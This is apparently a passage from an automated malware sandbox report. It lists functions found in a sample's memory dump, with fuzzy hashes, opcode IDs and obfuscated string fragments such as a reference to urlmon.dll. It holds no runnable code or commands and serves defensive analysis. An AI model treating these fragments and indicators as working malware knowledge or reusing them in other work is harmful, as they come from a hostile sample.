                                                        • Instruction ID: c70b0b42425cebd695a5cb2a94f2357b568820fe33c82708512fb5b9300cb76b
                                                        • Opcode Fuzzy Hash: 921b030c230440de0726696820ca5261c4a634c9c5d71502a68629f0eb4e272c
                                                        • Instruction Fuzzy Hash: 49E08637A4072437D630A699AC05FD7B7ACCBC5E60F190264FE1CAB341E961AA0047E5
                                                        Function 03E4BFF3 Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 878f29f21cbc96dad10bd07106ed5d6cf7f2163ab25b73c8c5ea1bea0e2e3775
                                                        • Instruction ID: f88a566441ba6473b0dd70cdb3a8b8751a1a44722df0778b98a190e80aa5ac21
                                                        • Opcode Fuzzy Hash: 878f29f21cbc96dad10bd07106ed5d6cf7f2163ab25b73c8c5ea1bea0e2e3775
                                                        • Instruction Fuzzy Hash: 9BF06D71815108AADB14CFA4E881BDEBB78EB48360F2083A9E819DB280D63697548B45
                                                        Function 03E5569B Relevance: .0, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b1cb065eba1c73ab1a9b1477b108b4dbb8e94e6f74e916b0cd078851467634e0
                                                        • Instruction ID: 2393250ba57afa9caf7e1a34d9c6493e62357f8f9742f3642e26e7e6c878bdd1
                                                        • Opcode Fuzzy Hash: b1cb065eba1c73ab1a9b1477b108b4dbb8e94e6f74e916b0cd078851467634e0
                                                        • Instruction Fuzzy Hash: A1E0C2ABE0132867C321E2A89C45DEFB24C9B42294F001392FD05EA150FE604F8042E6
                                                        Function 03E5CCD6 Relevance: .0, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: de80a8ed71822f980c586ba2ccbcacc3d85843b4b81fd9b74fa0ebae53fbcab3
                                                        • Instruction ID: 84e712c232649b08116e99fea91d2eb14d942951a8bdf583374485fbc2108e68
                                                        • Opcode Fuzzy Hash: de80a8ed71822f980c586ba2ccbcacc3d85843b4b81fd9b74fa0ebae53fbcab3
                                                        • Instruction Fuzzy Hash: CBE046762417047BC620EA59DC41EABB7ACDBC6620F408515FA09AB241D671B91187F0

                                                        Non-executed Functions

                                                        Function 03E48188 Relevance: 51.4, Strings: 41, Instructions: 173COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                        • API String ID: 0-3248090998
                                                        • Opcode ID: b9e5217d184e9b5f9a88de9e7237c2e2f9394286185c393cc3eef6ccabdc4c49
                                                        • Instruction ID: c9dd22679fb36fcfdae8e6851ff139811813cc4e099b461db3f6a7f3b7cf8681
                                                        • Opcode Fuzzy Hash: b9e5217d184e9b5f9a88de9e7237c2e2f9394286185c393cc3eef6ccabdc4c49
                                                        • Instruction Fuzzy Hash: DC91F1F09052A98ACB118F55A5603DFBF71BB85304F1581E9C6AA7B243C3BE4E46DF90
                                                        Function 03E562E6 Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                        • API String ID: 0-1002149817
                                                        • Opcode ID: b272e7f409098d0706e8b54b569d1d643d80dbdf23682bb1186596416bd5f9bc
                                                        • Instruction ID: 76fc40156078b8fc9158937ccba0b6a0e92e38d4985edf44d65e747a06dfaf02
                                                        • Opcode Fuzzy Hash: b272e7f409098d0706e8b54b569d1d643d80dbdf23682bb1186596416bd5f9bc
                                                        • Instruction Fuzzy Hash: F2C12DB1C013689EDB60DFA4CC44BEEBBB9AF45304F0051D9E548BB241E7B55A88CFA1
                                                        Function 03E536D7 Relevance: 25.3, Strings: 20, Instructions: 255COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                        • API String ID: 0-3236418099
                                                        • Opcode ID: 39dd5d9c397d86ea66d3dbff00dc7e0abce556c7e1ac0d202d1190dae7aa9199
                                                        • Instruction ID: a9bfb88ac6fe03c73f05b23bb39fcecf9a30bcf5073b99a0de7fe67484997566
                                                        • Opcode Fuzzy Hash: 39dd5d9c397d86ea66d3dbff00dc7e0abce556c7e1ac0d202d1190dae7aa9199
                                                        • Instruction Fuzzy Hash: 4D9140B5901318AEEB20DFA4DC44FEEB7BDEF45304F0052A9E90CAA140EB755B458FA5
                                                        Function 03E3E850 Relevance: 20.1, Strings: 16, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "E$+'$/N$0Y$1$^$^$kF$lS$n$q5$s$s3$sA$x$}
                                                        • API String ID: 0-2272718305
                                                        • Opcode ID: 119895b5784794660d04c4046bcd016ced32261a17f538e045d697261d4a457a
                                                        • Instruction ID: bb81b6b56b104d9e5d911d8b30494cd4c98b4c71905d223ad733b805ae439c84
                                                        • Opcode Fuzzy Hash: 119895b5784794660d04c4046bcd016ced32261a17f538e045d697261d4a457a
                                                        • Instruction Fuzzy Hash: 2D511FB0D05769CBEB60CF91C9587DEBBB1BB05308F20819DC1593B281D7BA1A89CF95
                                                        Function 03E3E856 Relevance: 20.1, Strings: 16, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "E$+'$/N$0Y$1$^$^$kF$lS$n$q5$s$s3$sA$x$}
                                                        • API String ID: 0-2272718305
                                                        • Opcode ID: 086a905ddda2fda45dbf3a1f70f2982aa3052b21ea49fb8dfdb216fb9fcc469f
                                                        • Instruction ID: e9f44b7267d894dafc0f6ba87eea1043c20104cda5c37bcb1c008f180d5decff
                                                        • Opcode Fuzzy Hash: 086a905ddda2fda45dbf3a1f70f2982aa3052b21ea49fb8dfdb216fb9fcc469f
                                                        • Instruction Fuzzy Hash: 99512EB0C05769CBEB60CF91C9587DEBBB1BB05308F20818DC1593B281D7BA1A89CF95
                                                        Function 03E4EE96 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                        • API String ID: 0-392141074
                                                        • Opcode ID: 5252413ce4bcb23e20e6f4736f039d3f73933e7686b5955067a4e93598df19fa
                                                        • Instruction ID: 9bc086a6a7ad20643180227e16fbcbcdb9342855516352b89742f6772ca14a62
                                                        • Opcode Fuzzy Hash: 5252413ce4bcb23e20e6f4736f039d3f73933e7686b5955067a4e93598df19fa
                                                        • Instruction Fuzzy Hash: 777110B5C10318ABDB65DFA4CC40FDEB77DAF48704F009299E519AA141EB725788CFA1
                                                        Function 03E4EE93 Relevance: 16.4, Strings: 13, Instructions: 177COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                        • API String ID: 0-392141074
                                                        • Opcode ID: 0bf1a97aaa8363c0ef7852bc004ad7f0c88a176eccf12c431c4d5ed8c9311925
                                                        • Instruction ID: 2941ef3c69a538f31665fc3ff78af885012e1f0f9ffee9437485ca261d8b6877
                                                        • Opcode Fuzzy Hash: 0bf1a97aaa8363c0ef7852bc004ad7f0c88a176eccf12c431c4d5ed8c9311925
                                                        • Instruction Fuzzy Hash: 59611DB5C10318AADB65DFA4CC40FDEB77DBF48704F008299E519AA180EB725788CFA1
                                                        Function 03E4EE90 Relevance: 16.4, Strings: 13, Instructions: 172COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                        • API String ID: 0-392141074
                                                        • Opcode ID: 398c9292f9e28510272aeedd6729d4a6b875da0ffcde4c2c55355511c461f371
                                                        • Instruction ID: 83cdc367ffef91139da057940f4417cca7a4a02a95312fb4d58d4cf624a5b615
                                                        • Opcode Fuzzy Hash: 398c9292f9e28510272aeedd6729d4a6b875da0ffcde4c2c55355511c461f371
                                                        • Instruction Fuzzy Hash: 0C611DB5C00318AADB65DFA4CC80FDEB77DBF48704F009299E519AA141EB765788CFA1
                                                        Function 03E42B5D Relevance: 13.8, Strings: 11, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                        • API String ID: 0-685823316
                                                        • Opcode ID: 6fb5c99784bfd45368b5b5cc851fdee953470dd05ea812544702cb9c47ac604f
                                                        • Instruction ID: 7595121e317ab5b6ba8f41426d1aa5dbf3fccd024dc4c4090b3f9739ea70a982
                                                        • Opcode Fuzzy Hash: 6fb5c99784bfd45368b5b5cc851fdee953470dd05ea812544702cb9c47ac604f
                                                        • Instruction Fuzzy Hash: 0C31C8B5D00318AADF54DFA0CC45BEEB7B9AF48304F00825CFA18BA180DBB516488BA4
                                                        Function 03E53BA1 Relevance: 12.8, Strings: 10, Instructions: 343COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: :$:$:$A$I$N$P$m$s$t
                                                        • API String ID: 0-2304485323
                                                        • Opcode ID: fdfffd99ba25e9dbac55ab6f15115227f78aabde3d04b42b215951cfe4fad7bb
                                                        • Instruction ID: d0ed6964e9af3a523892fe61dae30f182f0e68ef2dec75d37839c6c32c923ba6
                                                        • Opcode Fuzzy Hash: fdfffd99ba25e9dbac55ab6f15115227f78aabde3d04b42b215951cfe4fad7bb
                                                        • Instruction Fuzzy Hash: 56D1BAB6900305AFDB14DBA4CD41BEEB7B9AF98300F04561DF515EB240EB79AA05CBA1
                                                        Function 03E53BA6 Relevance: 12.7, Strings: 10, Instructions: 209COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: :$:$:$A$I$N$P$m$s$t
                                                        • API String ID: 0-2304485323
                                                        • Opcode ID: 13a227710854c3f32e156899929a147c2a639a301993a12d7d4478ed7aa6c1d6
                                                        • Instruction ID: ffa18f9e5c2a60fe85e23ce74fcfa25b98a865c32d23e029b769db59d8ceff97
                                                        • Opcode Fuzzy Hash: 13a227710854c3f32e156899929a147c2a639a301993a12d7d4478ed7aa6c1d6
                                                        • Instruction Fuzzy Hash: 4A81E9B5900308AFDB10DFA4CD41BEEB7B9AF58300F04561DF519EB240EB75AA05CBA5
                                                        Function 03E4A071 Relevance: 10.1, Strings: 8, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .$P$e$i$m$o$r$x
                                                        • API String ID: 0-620024284
                                                        • Opcode ID: 7989cdc732e5899902857284ee77f3e8438040161ec2e2a2a77ea5aeb2a7051c
                                                        • Instruction ID: fcbc61c76ed2f4392ba562f56c629d9e230d18d3f0d9faf7269f1a508f9a3b09
                                                        • Opcode Fuzzy Hash: 7989cdc732e5899902857284ee77f3e8438040161ec2e2a2a77ea5aeb2a7051c
                                                        • Instruction Fuzzy Hash: 2D5184B5800318BADB25EBA49C40FDB777DAF99300F00939DB948AA141EA7597488FB1
                                                        Function 03E56B46 Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: L$S$\$a$c$e$l
                                                        • API String ID: 0-3322591375
                                                        • Opcode ID: c87cfb4b75d59bb9f6269d364374cb13d1c2d13729a927474ec93afe3ec8bb73
                                                        • Instruction ID: 2877e833fe107a6f21b4df57a6a496473a7737d5640b840bdf07d0f744665d60
                                                        • Opcode Fuzzy Hash: c87cfb4b75d59bb9f6269d364374cb13d1c2d13729a927474ec93afe3ec8bb73
                                                        • Instruction Fuzzy Hash: B34153B6C10218AADF20DFA4DC84BEEB7F9FF48314F45525AED19AB100E7715A458BA0
                                                        Function 03E4EC47 Relevance: 7.7, Strings: 6, Instructions: 172COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: F$P$T$f$r$x
                                                        • API String ID: 0-2523166886
                                                        • Opcode ID: 7d3ac8791898e1ac3559358f7e28aa2db85787ba6202871b13cf28e606fefc66
                                                        • Instruction ID: e6dbe325d440f8f16b4734781ae331a10ed6412541fe9695a232cc5b633e2714
                                                        • Opcode Fuzzy Hash: 7d3ac8791898e1ac3559358f7e28aa2db85787ba6202871b13cf28e606fefc66
                                                        • Instruction Fuzzy Hash: 2551C371900305EAE734DFA9DC44BEBB7B8FF89704F045759A8185B180E7B5AA44CBA2
                                                        Function 03E4E356 Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $i$l$o$u
                                                        • API String ID: 0-2051669658
                                                        • Opcode ID: f3697019f948a7c46fbf51130d62a80f43842c3f5b3c1b4ab9ba8c77e6fbfa6f
                                                        • Instruction ID: 43991a87a04cc081f9d3c3ce9570ce15c4cea3c091ce7efdc6eaf09e0987e238
                                                        • Opcode Fuzzy Hash: f3697019f948a7c46fbf51130d62a80f43842c3f5b3c1b4ab9ba8c77e6fbfa6f
                                                        • Instruction Fuzzy Hash: EC614EB1900304AFDB24DBA4DC80FEFB7FDBB88714F144659E519A7240E735AA458BA1
                                                        Function 03E37D76 Relevance: 6.3, Strings: 5, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: *1$?u94$?u94*1$W(aj$aj)Q
                                                        • API String ID: 0-1735100797
                                                        • Opcode ID: a594ad1cfff7935315dbb16fe0cb6d7be1f3e34e7aada56f46be2a5aa28c45e5
                                                        • Instruction ID: 00080cc374c095e17c08af56a36bebe24f3e9f68ece5d755f4060e9aa02ee2c0
                                                        • Opcode Fuzzy Hash: a594ad1cfff7935315dbb16fe0cb6d7be1f3e34e7aada56f46be2a5aa28c45e5
                                                        • Instruction Fuzzy Hash: CCE092B1C0024CAACB40EFF8DC467AEBB74EB02300F109998D9249B241EB748A05C786
                                                        Function 03E4DFE3 Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $e$k$o
                                                        • API String ID: 0-3624523832
                                                        • Opcode ID: 1fcc15a128c89dcdaef9e9421e7d71595746c4bfc9e2d094f0613ad05d5ccd36
                                                        • Instruction ID: 80a7578857192681484ad9305db169d511c25e2a00065c5fd519cea0f3bfbfcf
                                                        • Opcode Fuzzy Hash: 1fcc15a128c89dcdaef9e9421e7d71595746c4bfc9e2d094f0613ad05d5ccd36
                                                        • Instruction Fuzzy Hash: 21B12DB5A00708AFDB24DBA4DC84FEFB7FDAF88704F148558F619A7240D675AA41CB50
                                                        Function 03E4E926 Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $e$h$o
                                                        • API String ID: 0-3662636641
                                                        • Opcode ID: 363b7e354ec313933072d44feba34db2de914b4a8d8fcbd633acf50b984bfac3
                                                        • Instruction ID: 40e639cd91f56f01934524af5b88988d1176b2f08800c609bb067ab0e1bd681b
                                                        • Opcode Fuzzy Hash: 363b7e354ec313933072d44feba34db2de914b4a8d8fcbd633acf50b984bfac3
                                                        • Instruction Fuzzy Hash: 848168B6C4021BAADB29EB64CD45FFF737DEF88300F0056A9E509A6140EB755B448FA1
                                                        Function 03E4DFE6 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $e$k$o
                                                        • API String ID: 0-3624523832
                                                        • Opcode ID: b9cf178eca340000401c805cc64b85fc6f58b1fdd13e9ff56098379ffb51081c
                                                        • Instruction ID: 77c2a0d1902aa1d7cb74e49f0e43134b0e68162607a010f220378f2805f17f40
                                                        • Opcode Fuzzy Hash: b9cf178eca340000401c805cc64b85fc6f58b1fdd13e9ff56098379ffb51081c
                                                        • Instruction Fuzzy Hash: AF611DB5A00309ABDB24DFA4DC84FEFB7BDAF88704F148558F65997240D771AA41CB50
                                                        Function 03E4DEA3 Relevance: 5.1, Strings: 4, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                        • API String ID: 0-2877786613
                                                        • Opcode ID: 34af4909c8d0adb1957544ece47f7940161f712b54c368f681fe8930c0b18d43
                                                        • Instruction ID: 07792f539825c352dbd980effa59682cfff711f30c632d833da4a561e6b403ea
                                                        • Opcode Fuzzy Hash: 34af4909c8d0adb1957544ece47f7940161f712b54c368f681fe8930c0b18d43
                                                        • Instruction Fuzzy Hash: 3141FD76911218BFEB11EF90CC41FEF777CAF99700F045249FA04AA180E774A60687B6
                                                        Function 03E4DEA6 Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                        • API String ID: 0-2877786613
                                                        • Opcode ID: 91b709fa3a6b9a548fd867d70b35368fbc2ab77ece1a555910101e561360e221
                                                        • Instruction ID: 5752e1ef15ec3210df3a1cc8a1720ac6e75e6d754cd25ce8aa4a39e28e77c524
                                                        • Opcode Fuzzy Hash: 91b709fa3a6b9a548fd867d70b35368fbc2ab77ece1a555910101e561360e221
                                                        • Instruction Fuzzy Hash: F6310F76911218BFEB11EFA4CC41FEF777CAF99700F045245FA04AA181E774A60687B6
                                                        Function 03E4A266 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -$3$3$c
                                                        • API String ID: 0-1704243376
                                                        • Opcode ID: 48730ee204db4ff63007629e4b2641897b7a00b98d2850bf6eeb9058e7a9332f
                                                        • Instruction ID: 5b13b8f9227e654b6c760fe110c1548a8dd32dc222486372dae2723469a7e3db
                                                        • Opcode Fuzzy Hash: 48730ee204db4ff63007629e4b2641897b7a00b98d2850bf6eeb9058e7a9332f
                                                        • Instruction Fuzzy Hash: 503141B5D10209BBDB14DBA4CD41BEE77B8EF48304F005158FD04AA240F772AB048BE5
                                                        Function 03E3B966 Relevance: 5.0, Strings: 4, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $!$4$J
                                                        • API String ID: 0-1503566715
                                                        • Opcode ID: b2b49ef1efa0337117e97ddcf6558143971d05b7dcf5f361bb618361a606ab3e
                                                        • Instruction ID: 2a73f00c4eb800c0a0a0a12d2876c54ca02d1d55193bb3d3d8921eb942130226
                                                        • Opcode Fuzzy Hash: b2b49ef1efa0337117e97ddcf6558143971d05b7dcf5f361bb618361a606ab3e
                                                        • Instruction Fuzzy Hash: 5E11A910D087CAD9DB12CBBD84182AEBF715F63224F0887D9D4E52A2D6C2754646C7A2